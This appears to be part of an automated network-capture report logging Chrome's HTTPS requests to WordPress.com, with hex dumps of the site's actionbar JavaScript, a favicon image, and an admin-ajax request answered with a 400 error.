                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC888INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 2e 77 70 63 6f 6d 7c 7c 7b 7d 3b 65 2e 61 63 74 69 6f 6e 62 61 72 3d 7b 7d 3b 65 2e 61 63 74 69 6f 6e 62 61 72 2e 64 61 74 61 3d 77 69 6e 64 6f 77 2e 61 63 74 69 6f 6e 62 61 72 64 61 74 61 3b 63 6f 6e 73 74 20 74 3d 65 2e 61 63 74 69 6f 6e 62 61 72 2e 64 61 74 61 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 3d 7b 7d 2c 6f 3d 28 29 3d 3e 7b 7d 29 7b 69 66 28 21 65 2e 61 63 74 69 6f 6e 29 7b 72 65 74 75 72 6e 7d 66 65 74 63 68 28 74 2e 78 68 72 55 52 4c 2c 7b 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 62 6f 64 79 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 65 29 2c 68 65 61 64 65 72 73 3a 7b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f
                                                                                                                                                                                                                                                Data Ascii: (function(){const e=window.wpcom||{};e.actionbar={};e.actionbar.data=window.actionbardata;const t=e.actionbar.data;function n(e={},o=()=>{}){if(!e.action){return}fetch(t.xhrURL,{method:"POST",body:new URLSearchParams(e),headers:{"Content-Type":"applicatio
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 74 2e 73 69 74 65 49 44 7d 29 7d 6c 65 74 20 61 3d 77 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 59 7c 7c 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 7c 7c 30 3b 69 66 28 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 74 6f 70 29 7b 72 65 74 75 72 6e 7d 63 6f 6e 73 74 20 6c 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 61 63 74 69 6f 6e 62 61 72 22 29 3b 69 66 28 21 6c 29 7b 72 65 74 75 72 6e 7d 6c 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 3b 69 66 28 74 2e 73 74 61 74 75 73 4d 65 73 73 61 67 65 29 7b 54 28 74 2e 73 74 61 74 75 73 4d 65 73 73 61 67 65 29 7d 6c 65 74 20 64 3d 66 61 6c 73 65 3b 63 6f 6e 73 74 20 75 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d
                                                                                                                                                                                                                                                Data Ascii: t.siteID})}let a=window.scrollY||window.pageYOffset||0;if(window!=window.top){return}const l=document.querySelector("#actionbar");if(!l){return}l.removeAttribute("style");if(t.statusMessage){T(t.statusMessage)}let d=false;const u=l.querySelector(".actnbr-
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 69 63 6b 22 2c 65 3d 3e 7b 69 28 22 63 6f 6d 6d 65 6e 74 5f 63 6c 69 63 6b 65 64 22 29 3b 24 28 22 77 70 63 6f 6d 5f 61 63 74 69 6f 6e 62 61 72 5f 63 6f 6d 6d 65 6e 74 5f 63 6c 69 63 6b 22 2c 7b 75 72 6c 3a 74 2e 73 69 74 65 55 52 4c 2c 62 6c 6f 67 5f 69 64 3a 74 2e 73 69 74 65 49 44 2c 70 6f 73 74 5f 69 64 3a 74 2e 70 6f 73 74 49 44 7d 29 7d 29 7d 69 66 28 5f 29 7b 5f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 63 6f 6e 73 74 20 6e 3d 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 69 73 2d 63 68 65 63 6b 65 64 22 29 3b 63 6f 6e 73 74 20 6f 3d 60 2f 72 65 61 64 2f 73 69 74 65 73
                                                                                                                                                                                                                                                Data Ascii: ick",e=>{i("comment_clicked");$("wpcom_actionbar_comment_click",{url:t.siteURL,blog_id:t.siteID,post_id:t.postID})})}if(_){_.addEventListener("click",e=>{e.preventDefault();const n=e.target.parentElement.classList.toggle("is-checked");const o=`/read/sites
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 6f 73 74 49 44 7d 29 7d 29 7d 63 6f 6e 73 74 20 71 3d 28 65 2c 6e 29 3d 3e 7b 79 2e 66 6f 72 45 61 63 68 28 65 3d 3e 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 69 73 2d 73 65 6c 65 63 74 65 64 22 29 29 3b 65 2e 74 61 72 67 65 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 69 73 2d 73 65 6c 65 63 74 65 64 22 29 3b 63 6f 6e 73 74 20 6f 3d 60 2f 72 65 61 64 2f 73 69 74 65 2f 24 7b 74 2e 73 69 74 65 49 44 7d 2f 70 6f 73 74 5f 65 6d 61 69 6c 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2f 75 70 64 61 74 65 60 3b 73 28 6f 2c 22 72 65 73 74 2f 76 31 2e 32 22 2c 7b 64 65 6c 69 76 65 72 79 5f 66 72 65 71 75 65 6e 63 79 3a 6e 7d 29 7d 3b 69 66 28 79 2e 6c 65 6e 67
                                                                                                                                                                                                                                                Data Ascii: ostID})})}const q=(e,n)=>{y.forEach(e=>e.parentElement.classList.remove("is-selected"));e.target.parentElement.classList.add("is-selected");const o=`/read/site/${t.siteID}/post_email_subscriptions/update`;s(o,"rest/v1.2",{delivery_frequency:n})};if(y.leng
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 62 74 6e 22 29 3b 69 66 28 64 26 26 21 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 29 7b 64 3d 66 61 6c 73 65 3b 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 7d 7d 29 3b 63 6f 6e 73 74 20 53 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 73 68 6f 72 74 6c 69 6e 6b 20 61 22 29 3b 69 66 28 53 29 7b 53 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 69 66 28 77 69 6e 64 6f 77 2e 65 6c 65 63 74 72 6f 6e 29 7b 77 69 6e 64 6f 77 2e 65 6c 65 63 74 72 6f 6e 2e 73 65 6e 64 28 22 63 6f 70 79 2d 74 65 78 74 2d 74 6f 2d 63
                                                                                                                                                                                                                                                Data Ascii: btn");if(d&&!n.classList.contains("actnbr-hidden")){d=false;n.classList.add("actnbr-hidden")}});const S=l.querySelector(".actnbr-shortlink a");if(S){S.addEventListener("click",e=>{e.preventDefault();if(window.electron){window.electron.send("copy-text-to-c
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 64 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 73 74 61 74 73 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 73 74 61 74 73 22 29 3b 78 28 22 2e 66 6c 62 2d 72 65 70 6f 72 74 20 61 22 2c 22 72 65 70 6f 72 74 65 64 5f 63 6f 6e 74 65 6e 74 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 73 20 61 22 2c 22 6d 61 6e 61 67 65 64 5f 66 6f 6c 6c 6f 77 69 6e 67 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 6c 6f 67 69 6e 2d 6e 75 64 67 65 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 6c 6f 67 69 6e 5f 6e 75 64 67 65 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 73 69 67 6e 75 70 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 73 69 67 6e 75 70 5f 6c 69 6e 6b 22 29 3b 78 28 22 2e 61 63 74 6e 62 72 2d 6c 6f 67 69 6e 20 61 22 2c 22 63 6c 69 63 6b 65 64 5f 6c 6f 67 69 6e 5f 6c 69 6e 6b 22
                                                                                                                                                                                                                                                Data Ascii: d");x(".actnbr-stats a","clicked_stats");x(".flb-report a","reported_content");x(".actnbr-follows a","managed_following");x(".actnbr-login-nudge a","clicked_login_nudge");x(".actnbr-signup a","clicked_signup_link");x(".actnbr-login a","clicked_login_link"
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC693INData Raw: 65 2e 74 69 6d 65 53 74 61 6d 70 5d 3d 74 72 75 65 3b 6f 2e 74 61 72 67 65 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 7d 69 28 65 2c 63 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 29 7b 63 6f 6e 73 74 20 65 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 66 6f 6c 6c 6f 77 2d 62 75 62 62 6c 65 20 66 6f 72 6d 22 29 3b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 73 74 79 6c 65 22 29 3b 63 6f 6e 73 74 20 74 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 22 29 3f 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 61 63 74 6e 62 72 2d 68 69 64 64 65 6e 22 29 3b 73 65 74 54 69 6d 65 6f 75 74 28
                                                                                                                                                                                                                                                Data Ascii: e.timeStamp]=true;o.target.dispatchEvent(e)}i(e,c)}}function M(){const e=l.querySelector(".actnbr-follow-bubble form");e.removeAttribute("style");const t=l.querySelector(".actnbr-actn-follow")?.parentNode;t&&t.classList.toggle("actnbr-hidden");setTimeout(


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                41192.168.2.1149810192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC346OUTGET /i/favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:42 GMT
                                                                                                                                                                                                                                                Content-Type: image/x-icon
                                                                                                                                                                                                                                                Content-Length: 15406
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Thu, 18 Apr 2024 07:27:55 GMT
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                ETag: "6620cb7b-3c2e"
                                                                                                                                                                                                                                                Expires: Fri, 18 Apr 2025 07:30:45 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC874INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 ec 5b 3a 35 e9 58 39 99 e9 58 38 d9 e9 59 38 f9 e9 59 38 f9 e9 58 38 db e9 58 39 99 e7 57 3a 35 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 55 40 0c e8 59 38 9a e9 59 38 f9 e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 fa e9 58 39 99 eb 4e 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 eb 62 3b 0d e9 58 39 bc e9 58 38 ff e9 58 38 ff ec 75 5b ff f3 ab 9b ff f5 b6 a8 ff f5
                                                                                                                                                                                                                                                Data Ascii: h6 (00 h&( [:5X9X8Y8Y8X8X9W:5U@Y8Y8X8X8X8X8X8X8Y8X9N;b;X9X8X8u[
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: e9 5c 3c ff f3 ab 9b ff f3 a5 94 ff eb 68 4c ff e9 5b 3b ff e9 5b 3b ff eb 68 4c ff f3 a5 94 ff f3 ad 9d ff e9 5c 3c ff e9 58 38 ff e8 58 39 99 ff ff 00 01 00 00 00 00 ea 55 40 0c e9 58 39 bc e9 58 38 ff e9 59 39 ff ed 79 60 ff f4 ad 9e ff f5 b6 a9 ff f5 b8 ab ff f4 ad 9d ff ed 76 5c ff e9 59 39 ff e9 58 38 ff e9 58 39 bc eb 62 3b 0d 00 00 00 00 00 00 00 00 00 00 00 00 eb 62 3b 0d eb 59 39 98 e9 59 38 fa e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 f9 e8 59 38 9a ea 55 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 e7 57 3a 35 e9 58 39 99 e9 58 38 db e9 58 38 f9 e9 58 38 f9 e9 58 38 d9 e9 58 39 99 ec 5b 3a 35 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: \<hL[;[;hL\<X8X9U@X9X8Y9y`v\Y9X8X9b;b;Y9Y8X8X8X8X8X8X8Y8Y8U@W:5X9X8X8X8X8X9[:5
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 00 00 00 00 00 00 00 e5 5c 38 32 e8 58 38 ed e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 5f 41 ff f7 c3 b8 ff fa da d3 ff ec 76 5c ff ed 7b 62 ff fe f6 f5 ff ff ff ff ff fb e3 dd ff ea 62 43 ff e9 58 38 ff e9 58 38 ff e9 59 39 ff f1 9b 88 ff fe fc fb ff ff ff ff ff f7 ca bf ff ed 79 5f ff fa da d3 ff f7 c6 bb ff e9 5f 41 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 ea e8 5b 3b 38 00 00 00 00 ff 66 33 05 e8 5a 3a 9b e9 58 38 fe e9 58 38 ff e9 58 38 ff e9 5a 3a ff f2 a5 93 ff fb e0 da ff ec 74 5a ff e9 5a 3a ff f4 b0 a0 ff ff fe fe ff ff fe fd ff fd ef ed ff ef 85 6e ff e9 58 38 ff e9 58 38 ff ea 5e 3f ff f8 d1 c9 ff ff ff ff ff ff fe fe ff fc eb e7 ff eb 6d 51 ff ec 76 5c ff fa de d8 ff f2 a3 91 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 98
                                                                                                                                                                                                                                                Data Ascii: \82X8X8X8X8_Av\{bbCX8X8Y9y__AX8X8X8Y9[;8f3Z:X8X8X8Z:tZZ:nX8X8^?mQv\Z:X8X8X8Y9
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 39 ff f2 a1 8f ff fe fd fc ff fd f2 f0 ff ec 75 5a ff fc e7 e3 ff ee 84 6c ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 cf ea 59 38 9b e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 67 49 ff fb e5 e0 ff f4 b1 a3 ff fe f7 f6 ff ff ff ff ff fe f6 f4 ff ed 76 5c ff e9 58 38 ff e9 58 38 ff e9 59 39 ff f2 a0 8e ff fe fd fc ff ff ff ff ff fb e1 db ff ea 61 43 ff e9 58 38 ff e9 58 38 ff eb 6c 4f ff fb e3 de ff ff ff ff ff fe f7 f5 ff f3 a7 97 ff fb e5 e0 ff ea 65 47 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 9f ea 5a 39 63 ea 59 38 fa e9 58 38 ff e9 58 38 ff e9 5a 3b ff f5 b4 a6 ff fd f8 f7 ff ff fe fe ff ff ff ff ff fb e2 dc ff ec 74 59 ff e9 5b 3c ff e9 5d 3d ff ec 74 59 ff f9 d7 d0 ff ff ff ff ff ff ff ff ff f7 c3 b8 ff eb 6b 4e ff e9 59 39 ff e9 5a 3a ff f3
                                                                                                                                                                                                                                                Data Ascii: 9uZlX8X8X8Y9Y8X8X8X8gIv\X8X8Y9aCX8X8lOeGX8X8X8X8Z9cY8X8X8Z;tY[<]=tYkNY9Z:
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 ea e9 59 38 8c e9 59 37 17 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 66 33 05 e5 57 38 32 ea 59 3a 9b ea 59 39 ea e9 59 38 fa e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 38 fa ea 59 39 e6 e9 59 39 98 e8 5b 3b 38 ff 66 33 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 66 33 05 ef 5a 3a 1f ea 58
                                                                                                                                                                                                                                                Data Ascii: X8X8X8X8X8X8X8X8X8X8X8Y9Y8Y7f3W82Y:Y9Y8X8X8X8X8X8X8X8X8Y8Y9Y9[;8f3f3Z:X
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ea 55 40 0c e5 57 3a 4f e9 58 39 b0 ea 59 39 ee ea 59 39 fc e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 38 fd e9 59 38 ec ea 58 39 aa eb 58 38 4e eb 62 3b 0d ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ed 5b 37
                                                                                                                                                                                                                                                Data Ascii: U@W:OX9Y9Y9X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8X8Y8Y8X9X8Nb;[7
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 5d 46 0b e6 57 38 7b e9 59 38 ec e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 5a 3b ff ec 77 5d ff f8 cd c3 ff fc ee eb ff f7 c5 b9 ff ee 81 69 ff f2 9f 8e ff fd f0 ed ff ff ff ff ff fd f4 f2 ff f1 99 85 ff e9 5c 3d ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 64 47 ff f5 ba ac ff fe fb fb ff ff fe fe ff fc ec e8 ff f2 a5 94 ff f7 c5 bb ff fc ed e9 ff f8 cb c1 ff ec 77 5d ff e9 5b 3b ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 39 ee e7 57 39 75 d4 55 40 0c 00 00 00 00 00 00 00 00 00 00 00 00 ff 55 55 03 e3 5a 39 36 e9 58 38 d9 e9 59 38 fd e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 3a ff ec 73 59 ff f8 cb c1 ff fd f1 ee ff f6 be b2 ff
                                                                                                                                                                                                                                                Data Ascii: ]FW8{Y8X8X8X8X8X8Z;w]i\=X8X8X8X8X8dGw][;X8X8X8X8X8Y9W9uU@UUZ96X8Y8X8X8X8X8Y:sY
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 38 ff e9 58 38 ff e9 5b 3c ff f1 9c 89 ff fc ed e9 ff f4 b4 a6 ff ea 62 43 ff e9 58 38 ff e9 59 39 ff eb 6e 52 ff f9 d8 d1 ff ff fe fe ff ff ff ff ff ff fd fd ff f9 d2 ca ff eb 6c 4f ff ea 5f 40 ff f3 a5 94 ff f7 c5 ba ff ec 6d 51 ff e9 5a 3b ff f0 8d 78 ff fc eb e8 ff ff ff ff ff ff ff ff ff fe f7 f5 ff f3 a6 95 ff ea 61 42 ff ed 7b 62 ff fc e6 e1 ff f4 ac 9b ff ea 5f 40 ff e9 58 38 ff ea 60 42 ff f4 b3 a4 ff fb ed e9 ff f2 9d 8a ff e9 5c 3c ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 f0 ec 5a 39 5e e9 59 39 98 e9 58 38 f6 e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 63 45 ff f5 b9 ab ff fc ed ea ff ef 85 6f ff e9 5b 3c ff e9 58 38 ff e9 5b 3b ff f0 8e 79 ff fc eb e8 ff ff ff ff ff ff ff ff ff fe f7 f6 ff f3 a8 98 ff ea 5f 40 ff e9
                                                                                                                                                                                                                                                Data Ascii: 8X8[<bCX8Y9nRlO_@mQZ;xaB{b_@X8`B\<X8X8X8X8X8Z9^Y9X8X8X8X8X8cEo[<X8[;y_@
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: ff f3 a5 94 ff fe f7 f5 ff ff ff ff ff ff ff ff ff fe f6 f4 ff f3 a5 94 ff e9 5d 3e ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 59 39 ff eb 6c 50 ff f8 cd c3 ff ff fc fc ff ff ff ff ff ff ff ff ff fb e4 df ff ee 81 69 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 60 41 ff f5 b3 a5 ff ff fb fb ff fa dd d7 ff ed 76 5c ff ea 60 42 ff f4 ae 9f ff fc e6 e2 ff ee 7e 65 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 fe e9 59 39 f2 e9 59 39 dc e9 58 39 fc e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ed 79 5f ff fa df d9 ff f7 c3 b6 ff ea 63 45 ff ea 68 4b ff f8 d0 c8 ff ff fd fd ff ff ff ff ff ff ff ff ff fc e7 e3 ff ef 85 6f ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 5a 3a ff ef 88 71 ff fb e8 e4 ff ff ff ff ff ff ff ff ff ff fe
                                                                                                                                                                                                                                                Data Ascii: ]>X8X8X8Y9lPiZ:X8X8X8`Av\`B~eX8X8X8X8X8Y9Y9X9X8X8X8X8y_cEhKoZ:X8X8X8Z:q
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: ea 61 43 ff eb 6b 4f ff f4 ac 9c ff f5 b7 aa ff f4 b3 a4 ff f4 aa 9b ff f4 a9 9a ff f4 aa 9a ff f4 ad 9e ff f4 b4 a6 ff f5 b4 a5 ff ee 81 6a ff e9 5a 3a ff e9 5a 3b ff f1 95 82 ff fd f0 ed ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fd fc ff fa df d9 ff ed 7a 60 ff e9 5a 3a ff e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 59 38 f4 e9 5a 39 7d e3 55 39 09 ff 80 00 02 ed 5b 37 38 e9 58 38 d0 ea 58 38 fe e9 58 38 ff e9 58 38 ff e9 58 38 ff e9 58 38 ff ea 5e 3f ff f2 a1 8f ff fc eb e7 ff f7 c6 ba ff ec 74 5a ff ea 60 42 ff ea 60 42 ff ea 61 43 ff e9 5f 40 ff e9 59 39 ff e9 5a 3b ff ea 61 42 ff ea 61 43 ff ea 60 42 ff ea 5f 40 ff ea 5f 40 ff ea 5f 40 ff ea 5f 41 ff ea 61 43 ff ea 61 43 ff e9 5c 3d ff e9 58 38 ff e9 5a 3a ff f0 8d 77 ff fc e9 e6
                                                                                                                                                                                                                                                Data Ascii: aCkOjZ:Z;z`Z:X8X8X8X8Y8Z9}U9[78X8X8X8X8X8X8^?tZ`B`BaC_@Y9Z;aBaC`B_@_@_@_AaCaC\=X8Z:w


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                42192.168.2.1149815192.0.78.134436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:43 UTC435OUTGET /wp-admin/admin-ajax.php HTTP/1.1
                                                                                                                                                                                                                                                Host: dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                Cookie: tk_ai=PfqOZc4jPU0a%2FtwKEstg1J5h; tk_qs=
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC483INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:44 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                X-hacker: Want root? Visit join.a8c.com/hacker and mention this header.
                                                                                                                                                                                                                                                Host-Header: WordPress.com
                                                                                                                                                                                                                                                X-Robots-Tag: noindex
                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                X-ac: 1.jfk _dca MISS
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC11INData Raw: 31 0d 0a 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 100


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
